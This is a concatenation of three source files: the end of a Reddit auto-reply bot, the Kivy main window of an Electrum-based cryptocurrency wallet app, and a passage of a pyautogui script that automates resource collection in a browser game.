if self.io[file]["save"]:
self._save_file(file, self.io[file]["attribute"])
self.io[file]["save"] = False
def _uptime_loop(self):
log(self.messages["uptime"], {"uptime": self.uptime})
self.uptime += self.config["rates"]["uptime"]
def add_comment_id(self, id):
self.processed["comments"].append(id)
if len(self.processed["comments"]) > 10000:
self.processed["comments"] = self.processed["comments"][5000:-1]
def should_reply_to(self, comment):
if comment.author.name in self.config["ignored_users"]:
return False
if comment.subreddit.display_name in self.config["ignored_subreddits"]:
return False
for phrase in self.config["phrases"]:
if phrase.lower() in comment.body.lower():
return True
return False
def get_formated_message(self, comment):
return ("\n".join(self.config["reply_message"])
.format(comment=comment))
def log(message, args=None):
if args is None:
logger.info(message)
else:
logger.info(message.format(**args))
if __name__ == "__main__":
logging_format = logging.Formatter("[%(asctime)s] [%(threadName)s]: %(message)s")
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
file_logger = logging.handlers.TimedRotatingFileHandler("logs/output.log",
when="midnight",
interval=1)
file_logger.setFormatter(logging_format)
logger.addHandler(file_logger)
console_logger = logging.StreamHandler()
console_logger.setFormatter(logging_format)
logger.addHandler(console_logger)
bot = WeDidItReddit()
try:
bot.start()
except (KeyboardInterrupt, SystemExit):
bot.stop()
for file in bot.io:
if bot.io[file]["save"]:
log(bot.messages["saving"])
bot._save_file(file, bot.io[file]["attribute"])
log(bot.messages["saved"])
log(bot.messages["shutdown"])
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import electrumpq
from electrumpq.bitcoin import TYPE_ADDRESS
from electrumpq import WalletStorage, Wallet
from electrumpq_gui.kivy.i18n import _
from electrumpq.paymentrequest import InvoiceStore
from electrumpq.util import profiler, InvalidPassword
from electrumpq.plugins import run_hook
from electrumpq.util import format_satoshis, format_satoshis_plain
from electrumpq.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble
from .uix.dialogs import OutputList, OutputItem
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrumpq.util import base_units
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == self.network.get_blockchain_name(b):
self.network.follow_chain(index)
#self.block
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) >1:
ChoiceDialog(_('Choose your chain'), names, '', cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bpq':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.electrum_config.get('base_unit', 'mBPQ')
def _set_bu(self, value):
assert value in base_units.keys()
self.electrum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
App.__init__(self)#, **kwargs)
title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrumpq.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bpq:'):
self.set_URI(data)
return
# try to decode transaction
from electrumpq.transaction import Transaction
from electrumpq.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrumpq.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrumpq.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False):
from .uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrumpq.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bpq: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, instance, wallet):
if wallet:
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
def load_wallet_by_name(self, path):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
Logger.debug('Electrum: Wallet not found. Launching install wizard')
storage = WalletStorage(path)
wizard = Factory.InstallWizard(self.electrum_config, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
def on_stop(self):
Logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrumpq. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrumpq.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
if self.network.interface:
self.server_host = self.network.interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging")
else:
status = ''
else:
status = _("Disconnected")
self.status = self.wallet.basename() + (' [size=15dp](%s)[/size]'%status if status else '')
# balance
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def get_max_amount(self):
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
amount = tx.output_value()
return format_satoshis_plain(amount, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet.has_password and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
d = os.listdir(dirname)
name = 'default_wallet'
new_path = os.path.join(dirname, name)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
FoE Bot.py
|
import pyautogui
from time import sleep
from random import randint
import threading
#opencv-python is required! (pip install opencv-python).
#functions to be run, you can change these!
collectGold = True #collect gold from buildings.
collectSupplies = True #collect supplies from buildings.
restartIdleBuildings = True #restart any idle building.
collectGoods = True #collect goods from buildings other than supplies and gold.
pressButtons = True #automatically aid other people and accept friend requests.
#One might need to change these based on screen resolution
ydiff1 = 25
ydiff2 = 50
pyautogui.FAILSAFE = False
lock = threading.Lock()
#Yes I know I'm a crappy programmer.
open("pause.txt", "w+").write("cont")
def processOutput(output):
#get coordinates to click from output
xcoord = int(output[0])
ycoord = int(output[1])
ycoord += ydiff1
#goto coordinates and click there
lock.acquire()
pyautogui.moveTo(xcoord, ycoord, duration=randint(5,15)/10)
sleep(randint(12,25)/100)
pyautogui.click()
pyautogui.moveRel(0, ydiff2, duration=randint(5,15)/20)
sleep(randint(6,12)/10/7)
pyautogui.click()
print("Bot has collected gold from a building.")
sleep(randint(80,100)/100)
pyautogui.typewrite(['esc'])
lock.release()
def processIdleOutput(output):
#get coordinates to click from output
xcoord = int(output[0])
ycoord = int(output[1])
ycoord += ydiff1
#goto coordinates and click there
lock.acquire()
pyautogui.moveTo(xcoord, ycoord, duration=randint(5,15)/10)
sleep(randint(12,25)/100)
pyautogui.click()
sleep(randint(70,90)/100)
pyautogui.typewrite(['1', '2', '3', '4', '5'])
pyautogui.moveRel(0, ydiff2, duration=randint(5,15)/20)
sleep(randint(6,12)/10/7)
pyautogui.click()
pyautogui.typewrite(['1', '2', '3', '4', '5'])
print("Bot has restarted a production building.")
sleep(randint(80,100)/100)
pyautogui.typewrite(['esc']) #for some reason [] are required around 'esc' to actually press the ESC button
lock.release()
def processButtonOutput(output,suppressESC):
lock.acquire()
#get coordinates to click from output
xcoord, ycoord, xcoord2, ycoord2 = output
#goto coordinates and click there
pyautogui.moveTo(randint(xcoord+1, xcoord+xcoord2-1), randint(ycoord+1, ycoord+ycoord2-1), duration=randint(5,15)/10)
sleep(randint(12,25)/100)
pyautogui.click()
print("Bot has clicked a button.")
if suppressESC == False:
sleep(randint(80,100)/100)
pyautogui.typewrite(['esc'])
lock.release()
def worker1(lock): #gold icons
while True:
output = pyautogui.locateOnScreen('gold1.png', confidence=0.905)
lock.acquire()
print("gold1:", output)
lock.release()
if output == None:
output = pyautogui.locateOnScreen('gold2.png', confidence=0.895)
lock.acquire()
print("gold2:", output)
lock.release()
if not output == None:
processOutput(output)
def worker2(lock): #supplies icons
while True:
output = pyautogui.locateOnScreen('supplies1.png', confidence=0.805)
lock.acquire()
print("supplies1:", output)
lock.release()
if output== None:
output = pyautogui.locateOnScreen('supplies2.png', confidence=0.820)
lock.acquire()
print("supplies2:", output)
lock.release()
if not output == None:
processOutput(output)
def worker3(lock): #idle building icons
while True:
output = pyautogui.locateOnScreen('idle1.png', confidence=0.545)
